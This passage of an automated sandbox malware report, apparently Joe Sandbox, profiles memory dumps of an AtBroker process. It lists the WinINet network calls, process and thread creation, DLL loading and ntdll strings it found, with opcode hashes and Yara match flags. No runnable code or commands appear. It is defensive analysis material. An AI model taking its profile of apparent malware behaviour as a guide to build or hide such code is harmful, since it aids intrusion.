                                            • Instruction Fuzzy Hash: 24313EB5A0020A9FDB10DFD8C8809EFB3B9FF88304B108559E905EB204DB75AA458BA0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 0000000F.00000002.21015350999.0000000002AA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02AA0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_15_2_2aa0000_AtBroker.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: eee9791b7db460c1ac4f0c9abeac049ffefacfe8d0070be8d7e7415619cf8690
                                            • Instruction ID: 1185d339e9eb096233dc4235ff1912f8d9d3e5ba18c0875d73234a5bd39cbe09
                                            • Opcode Fuzzy Hash: eee9791b7db460c1ac4f0c9abeac049ffefacfe8d0070be8d7e7415619cf8690
                                            • Instruction Fuzzy Hash: 8D11AB315082221FCB23EE38DD855DA7BB9DF412207188A54D696C7187FB22D90ADE90
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • InternetConnectA.WININET(?,?,?,?,?,00000000,?,?), ref: 02AC9416
                                            Memory Dump Source
                                            • Source File: 0000000F.00000002.21015350999.0000000002AA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02AA0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_15_2_2aa0000_AtBroker.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ConnectInternet
                                            • String ID:
                                            • API String ID: 3050416762-0
                                            • Opcode ID: 853fd5e5f89e830a1d33d842df26653083848945652800591a7c978c5d1fbed5
                                            • Instruction ID: 2a38e7fc92a1bf9cb371fe91d0ee9237c672d6ba3822818252fcadbed3fdf008
                                            • Opcode Fuzzy Hash: 853fd5e5f89e830a1d33d842df26653083848945652800591a7c978c5d1fbed5
                                            • Instruction Fuzzy Hash: B611B9B1915219AFCB50DFA8D940EEF7BF9EF4C210F0541AAE908E3201E634A9108BA1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • HttpOpenRequestA.WININET(?,?,?,?,?,00000000,?,?), ref: 02AC94A6
                                            Memory Dump Source
                                            • Source File: 0000000F.00000002.21015350999.0000000002AA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02AA0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_15_2_2aa0000_AtBroker.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: HttpOpenRequest
                                            • String ID:
                                            • API String ID: 1984915467-0
                                            • Opcode ID: fe980ccff1e02633bed656e3b0a50fb7f8ed76f35967aa2515de016086fb3590
                                            • Instruction ID: 726f57eaba1f2ba2dce0f2342f87776e4df6e11a44ed019f6eca09a6b6aa9c43
                                            • Opcode Fuzzy Hash: fe980ccff1e02633bed656e3b0a50fb7f8ed76f35967aa2515de016086fb3590
                                            • Instruction Fuzzy Hash: FF11BC71915119AFCB54DFA8D940DEF77F9EF4C210F0541AAE90CE3201D63499108BE1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • InternetOpenA.WININET(?,?,?,?,?), ref: 02AC938A
                                            Memory Dump Source
                                            • Source File: 0000000F.00000002.21015350999.0000000002AA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02AA0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_15_2_2aa0000_AtBroker.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: InternetOpen
                                            • String ID:
                                            • API String ID: 2038078732-0
                                            • Opcode ID: 3d59941e20208d5dabe05eaea7226c83d1760ed76f2524a7cc9ec2d0f1a7ede9
                                            • Instruction ID: 5b64918b28ebd750bad6b0ce1cd74c7a966e6d0a6831c27ad4c55074179bd6c6
                                            • Opcode Fuzzy Hash: 3d59941e20208d5dabe05eaea7226c83d1760ed76f2524a7cc9ec2d0f1a7ede9
                                            • Instruction Fuzzy Hash: E111B171D15219AFCB50DFE8D845AFF77F9EF48310F0541AAE908E7201D6349A108BE1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • HttpSendRequestA.WININET(?,?,?,?,?), ref: 02AC952A
                                            Memory Dump Source
                                            • Source File: 0000000F.00000002.21015350999.0000000002AA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02AA0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_15_2_2aa0000_AtBroker.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: HttpRequestSend
                                            • String ID:
                                            • API String ID: 360639707-0
                                            • Opcode ID: cb6639804068c3dab6adede41b12353d17b00613fefbe5b2bc22df23d9a95d2b
                                            • Instruction ID: c6e068282bb3a5083bf48c279f2dc9639ec147ae7e16174a9cfcba87c7cbb5b8
                                            • Opcode Fuzzy Hash: cb6639804068c3dab6adede41b12353d17b00613fefbe5b2bc22df23d9a95d2b
                                            • Instruction Fuzzy Hash: 5111B1B1D15219AFDB54DFE8D9459FF77F9EF48310F0441AAE908E7201D6349A108BE1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 02AB5812
                                            Memory Dump Source
                                            • Source File: 0000000F.00000002.21015350999.0000000002AA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02AA0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_15_2_2aa0000_AtBroker.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Load
                                            • String ID:
                                            • API String ID: 2234796835-0
                                            • Opcode ID: 50ac99ea22c249302e21177034580319d52979a9e29fa41dd55d5461cc001504
                                            • Instruction ID: 8ca79edcdec4601489ab2a0d63ae1357ee70718e150eb74f73ff60e9f32c2a4c
                                            • Opcode Fuzzy Hash: 50ac99ea22c249302e21177034580319d52979a9e29fa41dd55d5461cc001504
                                            • Instruction Fuzzy Hash: 10010CB5E4020DEBDB10DBA4DD82FDDB37D9F44308F1045A9E90897241FA71EA58CBA1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • CreateProcessInternalW.KERNEL32(02AB2431,02AB2459,02AB2231,00000000,02AB9093,00000010,02AB2459,?,?,00000044,02AB2459,00000010,02AB9093,00000000,02AB2231,02AB2459), ref: 02AC9023
                                            Memory Dump Source
                                            • Source File: 0000000F.00000002.21015350999.0000000002AA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02AA0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_15_2_2aa0000_AtBroker.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CreateInternalProcess
                                            • String ID:
                                            • API String ID: 2186235152-0
                                            • Opcode ID: 04b48f43fc5177540e630cbbd7d3b3b4406bd591564a80cc7aed67d0a246ed7b
                                            • Instruction ID: e807929f28c5660c4d860fce7c31d0f92b1f0017c42f9b075e1aa3ac2a45f204
                                            • Opcode Fuzzy Hash: 04b48f43fc5177540e630cbbd7d3b3b4406bd591564a80cc7aed67d0a246ed7b
                                            • Instruction Fuzzy Hash: C30196B2204208BBDB44DF99DC90EEB77EDAF8C754F158508BA1DE3240D630F8518BA4
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • CreateThread.KERNEL32(00000000,00000000,-00000002,?,00000000,00000000), ref: 02AAAE25
                                            Memory Dump Source
                                            • Source File: 0000000F.00000002.21015350999.0000000002AA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02AA0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_15_2_2aa0000_AtBroker.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CreateThread
                                            • String ID:
                                            • API String ID: 2422867632-0
                                            • Opcode ID: d0e148906c42d907c47f02b5baed2ab842622fe2ed1c6b060e90039ef33c6672
                                            • Instruction ID: cce877b2b75f34fc4610f9b1dbbbbba9b3c7d1fe0216f9d7842fda460c84f334
                                            • Opcode Fuzzy Hash: d0e148906c42d907c47f02b5baed2ab842622fe2ed1c6b060e90039ef33c6672
                                            • Instruction Fuzzy Hash: FCF0657739021436E23066ED9C02FDB779DDF90B71F140429FA0CEB1C0DE95B80246A4
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • RtlAllocateHeap.NTDLL(00000104,02AB46BC,02AC21DC,02AB46BC,?,02AC21DC,02AB46BC,00000104,02AB46BC,0000C994), ref: 02AC8F1F
                                            Memory Dump Source
                                            • Source File: 0000000F.00000002.21015350999.0000000002AA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02AA0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_15_2_2aa0000_AtBroker.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: AllocateHeap
                                            • String ID:
                                            • API String ID: 1279760036-0
                                            • Opcode ID: ca8440063db6e4452a08d5a9e58476cc5009a3b060571a389de21d7d65b57b96
                                            • Instruction ID: 3d58e59e27467aa38be7d62c083fc3c5b35a27486fae0d384f2783021bec78b1
                                            • Opcode Fuzzy Hash: ca8440063db6e4452a08d5a9e58476cc5009a3b060571a389de21d7d65b57b96
                                            • Instruction Fuzzy Hash: C5E065B2204204BBD610EE98DC41FAB77ADEF88720F008418F908A7241DB71B810CBB4
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • RtlFreeHeap.NTDLL(00000000,00000004,00000000,035088C0,00000007,00000000,00000004,00000000,02AB51E4,000000F0,?,?,?,?,?), ref: 02AC8F6F
                                            Memory Dump Source
                                            • Source File: 0000000F.00000002.21015350999.0000000002AA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02AA0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_15_2_2aa0000_AtBroker.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: FreeHeap
                                            • String ID:
                                            • API String ID: 3298025750-0
                                            • Opcode ID: 5e6e78ecaea4acb9c9718784cd34aee49f4508e8e8dc6b07355fe275349d9a39
                                            • Instruction ID: f1363029121f5d5ec233daf729e17513e6d971ccd6b808347a5189d840b54291
                                            • Opcode Fuzzy Hash: 5e6e78ecaea4acb9c9718784cd34aee49f4508e8e8dc6b07355fe275349d9a39
                                            • Instruction Fuzzy Hash: C3E065B6204208BBD610EE99DC40FAB37ADEFC9750F008409FA08A7241DA32B8108AB4
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • SetErrorMode.KERNEL32(00008003,?,?,02AB308A,?,02AC5A17,02AC6523), ref: 02AB8F13
                                            Memory Dump Source
                                            • Source File: 0000000F.00000002.21015350999.0000000002AA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02AA0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_15_2_2aa0000_AtBroker.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ErrorMode
                                            • String ID:
                                            • API String ID: 2340568224-0
                                            • Opcode ID: 1a3ee3041b2573545498f04c2be1b23f666de90af0d67f1e5d2001b9baa75a67
                                            • Instruction ID: e25927835f29aa5a843c536b6541db67988914a16a20419e8b24e0d737266ce3
                                            • Opcode Fuzzy Hash: 1a3ee3041b2573545498f04c2be1b23f666de90af0d67f1e5d2001b9baa75a67
                                            • Instruction Fuzzy Hash: C2D05E722842047BF640B7B98C4BF563A8D9B44758F144068BA0CD72C2EE59F4018966
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • PostThreadMessageW.USER32(?,00000111), ref: 02AB1FF7
                                            Memory Dump Source
                                            • Source File: 0000000F.00000002.21015350999.0000000002AA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02AA0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_15_2_2aa0000_AtBroker.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: MessagePostThread
                                            • String ID:
                                            • API String ID: 1836367815-0
                                            • Opcode ID: cd11d55857e50e9293af255402c5c86e331596148f99e511fa3e3e30c6db0de7
                                            • Instruction ID: a394b0be71aa7d31d70027d80e678bd3c5cffa18952b8d785808864b20dae785
                                            • Opcode Fuzzy Hash: cd11d55857e50e9293af255402c5c86e331596148f99e511fa3e3e30c6db0de7
                                            • Instruction Fuzzy Hash: 55D02277B0000C3ABA1246C4ACC1EFFB72CEF84AA6F004063FF08E2040EA218D024BB0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • GetFileAttributesW.KERNEL32(0000224E), ref: 02AB90FC
                                            Memory Dump Source
                                            • Source File: 0000000F.00000002.21015350999.0000000002AA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02AA0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_15_2_2aa0000_AtBroker.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: AttributesFile
                                            • String ID:
                                            • API String ID: 3188754299-0
                                            • Opcode ID: 1edbe51131ce3803ae88532e452d5bc06a650e44c04ab8cfc280427a75b3f74a
                                            • Instruction ID: ed4ae941d12e637c0dce3327cc28efcca5bfcaf863cfcf1d3998f2ff97ca7ad6
                                            • Opcode Fuzzy Hash: 1edbe51131ce3803ae88532e452d5bc06a650e44c04ab8cfc280427a75b3f74a
                                            • Instruction Fuzzy Hash: 2CD05E3418D2410ED76287696CC92E63B188F82128F184A91E968CB1E3D722E95EE650
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000F.00000002.21019048735.0000000004A70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A70000, based on PE: true
                                            • Associated: 0000000F.00000002.21019048735.0000000004B99000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000F.00000002.21019048735.0000000004B9D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_15_2_4a70000_AtBroker.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 5b1a11ad0be6697cb79911ca8a020db4c9eb647f8727f96606cefbc7f6c3edb9
                                            • Instruction ID: 13ce46f7c060b68ad6a73f937552750a23a88a630661debc505893cf50ff762b
                                            • Opcode Fuzzy Hash: 5b1a11ad0be6697cb79911ca8a020db4c9eb647f8727f96606cefbc7f6c3edb9
                                            • Instruction Fuzzy Hash: 76B09B729014C5C5FF11FF604B087177904ABD0755F55C455E2560741E477CD091F175
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Strings
                                            • ExecuteOptions, xrefs: 04B144AB
                                            • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 04B14530
                                            • CLIENT(ntdll): Processing section info %ws..., xrefs: 04B14592
                                            • Execute=1, xrefs: 04B1451E
                                            • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 04B14507
                                            • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 04B14460
                                            • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 04B1454D
                                            Memory Dump Source
                                            • Source File: 0000000F.00000002.21019048735.0000000004A70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A70000, based on PE: true
                                            • Associated: 0000000F.00000002.21019048735.0000000004B99000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000F.00000002.21019048735.0000000004B9D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_15_2_4a70000_AtBroker.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                            • API String ID: 0-484625025
                                            • Opcode ID: 8b8c519662176b5c68dd801c1ef727c17385c9381256cce1a4a70c78c6dbba53
                                            • Instruction ID: 2751cf3aa21d8edaa4043051e5341c9b64152af25b37d66c5a10b86542794614
                                            • Opcode Fuzzy Hash: 8b8c519662176b5c68dd801c1ef727c17385c9381256cce1a4a70c78c6dbba53
                                            • Instruction Fuzzy Hash: 8E51F635A00219BAEF14AFA5ED95FB973A8FF08304F4404E9E506A7190EB70BE418F61
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000F.00000002.21019048735.0000000004A70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A70000, based on PE: true
                                            • Associated: 0000000F.00000002.21019048735.0000000004B99000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000F.00000002.21019048735.0000000004B9D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_15_2_4a70000_AtBroker.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: $$@
                                            • API String ID: 0-1194432280
                                            • Opcode ID: a6d2c28ecb8a1de4d726c61be80073636e0e67734c1b6635ed979652113d24f1
                                            • Instruction ID: 6977005a1c8e501bcfcf694b2e8bfe650c9794533c81978843b24d5018a0a9f3
                                            • Opcode Fuzzy Hash: a6d2c28ecb8a1de4d726c61be80073636e0e67734c1b6635ed979652113d24f1
                                            • Instruction Fuzzy Hash: 61812EB1D012699BDB35CF54CD44BDEB7B8AB04754F0045DAEA09B7290E7706E84CFA1
                                            Uniqueness

                                            Uniqueness Score: -1.00%